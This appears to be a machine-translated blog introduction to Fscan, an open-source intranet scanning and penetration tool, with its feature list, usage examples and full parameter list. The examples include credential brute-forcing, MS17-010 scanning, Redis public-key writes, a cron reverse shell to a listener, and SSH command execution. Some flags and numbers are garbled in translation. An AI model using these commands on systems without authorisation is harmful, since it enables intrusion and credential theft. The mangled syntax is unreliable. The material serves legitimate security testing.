Fscan: an open source tool with one click automation and omni-directional vulnerability scanning

Time:2021-11-30

brief introduction

Fscan is a comprehensive intranet scanning tool, which is convenient for one click automation and all-round vulnerability scanning.

It supports host survival detection, port scanning, blasting of common services, ms17010, redis batch writing public key, planning task rebound shell, reading win network card information, web fingerprint identification, web vulnerability scanning, NetBIOS detection, domain control identification and other functions.

Source code link:https://github.com/shadow1ng/…

major function

1. Information collection:

  • Survival detection (ICMP)
  • Port scan

2. Blasting function:

  • Various services (SSH, SMB, etc.)
  • Database password explosion (mysql, MSSQL, redis, PSQL, etc.)

3. System information and vulnerability scanning:

  • Get target network card information
  • High risk vulnerability scanning (ms17010, etc.)

4. Web detection function:

  • Webtitle detection
  • Web fingerprint identification (common CMS, OA framework, etc.)
  • Web vulnerability scanning (Weblogic, ST2, etc., POC supporting Xray)

5. Exploit:

  • Redis write public key or write scheduled task
  • SSH command execution

6. Other functions:

  • file save

usege

Simple usage

fscan.exe  - h   192.168.1.1/24    (all modules are used by default)  
fscan.exe  - h   192.168.1.1/16    (segment B scan)

Other uses

fscan.exe  - h   192.168.1.1/24  - np  - no  - Nopoc (skip survival detection)  、 Do not save files, skip Web   POC (scan)  
fscan.exe  - h   192.168.1.1/24  - rf   id_ rsa.pub   (redis   Write public key)  
fscan.exe  - h   192.168.1.1/24  - rs   192.168.1.1:6666   (redis   Scheduled tasks (shell)  
fscan.exe  - h   192.168.1.1/24  - c   whoami   (ssh   Command execution after successful blasting)  
fscan.exe  - h   192.168.1.1/24  - m   ssh  - p   two thousand two hundred and twenty-two   (specify module SSH and port)  
fscan.exe  - h   192.168.1.1/24  - pwdf   pwd.txt  - userf   users.txt   (load the user name and password of the specified file for blasting)  
fscan.exe  - h   192.168.1.1/24  - o  / tmp/1.txt   (specify the path to save the scanning results, which is saved in the current path by default)   
fscan.exe  - h   192.168.1.1/8    (192. X.x.1 and 192. X.x.254 of segment a are convenient for quick viewing of network segment information  )  
fscan.exe  - h   192.168.1.1/24  - m   smb  - pwd   password   (SMB password collision)  
fscan.exe  - h   192.168.1.1/24  - m   ms17010   (specify module)  
fscan.exe  - hf   ip.txt    (import as file)

Compile command

go build -ldflags="-s -w " -trimpath  

Complete parameters

-Num int  
        poc rate (default 20)  
  -c string  
        exec command (ssh)  
  -cookie string  
        set poc cookie  
  -debug  
        debug mode will print more error info  
  -domain string  
        smb domain  
  -h string  
        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12  
  -hf string  
        host file, -hs ip.txt  
  -m string  
        Select scan type ,as: -m ssh (default "all")  
  -no  
        not to save output log  
  -nopoc  
        not to scan web vul  
  -np  
        not to ping  
  -o string  
        Outputfile (default "result.txt")  
  -p string  
        Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9200,11211,270179098,9448,8888,82,8858,1081,8879,21502,9097,8088,8090,8200,91,1080,889,8834,8011,9986,9043,9988,7080,10000,9089,8028,9999,8001,89,8086,8244,9000,2008,8080,7000,8030,8983,8096,8288,18080,8020,8848,808,8099,6868,18088,10004,8443,8042,7008,8161,7001,1082,8095,8087,8880,9096,7074,8044,8048,9087,10008,2020,8003,8069,20000,7688,1010,8092,8484,6648,9100,21501,8009,8360,9060,85,99,8000,9085,9998,8172,8899,9084,9010,9082,10010,7005,12018,87,7004,18004,8098,18098,8002,3505,8018,3000,9094,83,8108,1118,8016,20720,90,8046,9443,8091,7002,8868,8010,18082,8222,7088,8448,18090,3008,12443,9001,9093,7003,8101,14000,7687,8094,9002,8082,9081,8300,9086,8081,8089,8006,443,7007,7777,1888,9090,9095,81,1000,18002,8800,84,9088,7071,7070,8038,9091,8258,9008,9083,16080,88,8085,801,5555,7680,800,8180,9800,10002,18000,18008,98,28018,86,9092,8881,8100,8012,8084,8989,6080,7078,18001,8093,8053,8070,8280,880,92,9099,8181,9981,8060,8004,8083,10001,8097,21000,80,7200,888,7890,3128,8838,8008,8118,9080,2100,7180,9200")  
  -ping  
        using ping replace icmp  
  -pocname string  
        use the pocs these contain pocname, -pocname weblogic  
  -proxy string  
        set poc proxy, -proxy http://127.0.0.1:8080  
  -pwd string  
        password  
  -pwdf string  
        password file  
  -rf string  
        redis file to write sshkey file (as: -rf id_rsa.pub)  
  -rs string  
        redis shell to write cron file (as: -rs 192.168.1.1:6666)  
  -t int  
        Thread nums (default 600)  
  -time int  
        Set timeout (default 3)  
  -u string  
        url  
  -uf string  
        urlfile  
  -user string  
        username  
  -userf string  
        username file  
  -wt int  
        Set web timeout (default 5)  

Running screenshot

fscan.exe -h 192.168.x.x   (full function, ms17010, read network card information)

Fscan: an open source tool with one click automation and omni-directional vulnerability scanning

fscan.exe -h 192.168.x.x -rf id\_ Rsa.pub (redis write public key)

Fscan: an open source tool with one click automation and omni-directional vulnerability scanning

Fscan.exe – H 192.168. X.x – C “whoamI; ID” (SSH command)

Fscan: an open source tool with one click automation and omni-directional vulnerability scanning

fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080POC with one click support for Xray

Fscan: an open source tool with one click automation and omni-directional vulnerability scanning

The developers of this project refer to these open source projects:

Open source outpostShare popular, interesting and practical open source projects on a daily basis. Participate in maintaining the open source technology resource library of 100000 + star, including python, Java, C / C + +, go, JS, CSS, node.js, PHP,. Net, etc.